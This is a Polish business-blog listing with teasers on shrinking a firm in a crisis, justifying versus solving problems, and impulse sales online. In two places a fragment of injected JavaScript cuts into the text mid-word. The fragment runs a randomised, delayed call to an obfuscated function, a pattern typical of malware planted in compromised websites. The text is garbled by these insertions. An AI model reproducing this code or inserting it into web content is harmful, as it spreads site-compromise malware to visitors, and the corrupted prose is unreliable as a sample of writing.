Łatwiej urosnąć niż się skurczyć

Kiedy w firmie (czy w jej o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczeniu) pojawia się kryzys, firmy zwykle reagują „okopaniem się”. Zaczynają rozglądać się, [...]

Łatwiej uzasadnić niż rozwiązać

I dlatego wszyscy skupiają się na uzasadnianiu. Uzasadnienia Szefów jest zwykle mniej niż klientów. Ma się też do nich bezpośredni dostęp. Dlatego łatwiej sterować szefem niż klientami. Jeśli np. [...]

Sprzedaż impulsowa online

W każdej firmie handlowej jakaś część sprzedaży pochodzi ze sprzedaży impulsowej. Uwaga. „co dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jest sprzedaż impulsowa?” [...]